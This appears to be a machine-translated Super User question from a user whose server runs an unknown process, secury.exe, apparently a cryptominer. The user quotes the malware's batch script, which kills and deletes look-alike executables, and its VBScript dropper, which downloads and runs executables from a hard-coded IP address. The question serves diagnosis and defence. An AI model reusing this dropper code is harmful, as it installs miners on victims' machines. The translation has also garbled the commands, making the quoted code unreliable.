windows - Como matar permanentemente o bootstrapper do cliente de vapor - Super User

Eu tenho a seguinte situação no meu gerenciador de tarefas:

Eu tenho a seguinte situação no meu gerenciador de tarefas:

Eu não sei que tipo de aplicativo é, mas definitivamente não é bootstrapper do cliente Steam porque eu não o instalei e também não consigo desinstalá-lo.

Se eu tentar descobrir que tipo de aplicativo é esse passo:

Eu vejo algo assim:

No utilitário de configuração do MS não encontrei nada parecido com secury.exe.

Quando abro a localização do arquivo, vejo três arquivos:

m.bat, b.exe, 4.vbs.

Abaixo segue o conteúdo do m.bat:

taskkill / f / t / im secury.exe taskkill c: \ ProgramData \ secury.exe / f / t / im taskkill kingsoft.exe / f / t / im taskkill expl0rer.exe / f / t / im taskkill / ieplare.exev taskkill / f / t / im taskkill / f / t / im nssm.exe taskkill / f / t / im tarefa-tarefa do SystemSettlngs.exe / f / t / im Taskkill do SystemSetting.exe / f / t / im taskkill do Process.exe / taskkill / f / t / im tasklill do winlnlt.exe / t / im Taskkill do WindowsUpgrade.exe / f / t / im taskkill do msdc.exe / f / t / im Tarefa-tarefa do fiddlere.exe / f / t / im taskkill do shovst.exe / f / t / im taskkill lqrtqe.exe / f / t / im apkls.exe taskkill / f / t / im taskkill winlog.exe / f / t / im taskkill svchosts.exe / f / t / im taskkill win1ogins.exe / Tarefa / f / t / im shovsts.exe taskkill / f / t / im taskkill fcty.exe / f / t / im soiuos.exe tarefa / f / t / im TrustedInstaller.exe do C: \ Windows \ System32 \ soiuos.exe del C: \ Windows \ Setup \ TrustedInstaller.exe do C: \ ProgramData \ kingsoft.exe do C: \ ProgramData \ expl0rer.exe do C: \ ProgramData \ ieplare.exe do C: \ ProgramData \ nssm.exe do C: \ ProgramData \ MSASCui.exe del C: \ Pro gramData \ SystemSettlngs.exe del C: \ ProgramData \ SystemSetting.exe del C: \ ProgramData \ Process.exe del C: \ ProgramData \ winlnlt.exe del C: \ ProgramData \ WindowsUpgrade.exe del C: \ ProgramData \ msdc.exe do C: \ ProgramData \ Fiddlere.exe do C: \ ProgramData \ shovst.exe do C: \ ProgramData \ lqrtqe.exe do C: \ ProgramData \ apkls.exe do C: \ ProgramData \ winlog.exe del C: \ ProgramData \ svchosts.exe do C: \ ProgramData \ win1ogins.exe do C: \ ProgramData \ shovsts.exe do C: \ ProgramData \ fcty.exe do C: \ ProgramData \ pool.exe do C: \ ProgramData \ pool2.exe del C: \ ProgramData \ pool3.exe

Próxima vai 4.vbs:

Defina xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Definir sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ s2.exe", 2 conjunto xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Definir sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell"). Execute "C: \ ProgramData \ pool3.exe" CreateObject ( "WScript.Shell"). Execute "del C: \ ProgramData \ pool3.exe"

O que posso fazer para impedir que o secury.exe abuse dos recursos de computação do meu servidor?

PS Eu executei a verificação completa do Avast no meu computador, mas não encontrei nada de errado.

Exe abuse dos recursos de computação do meu servidor?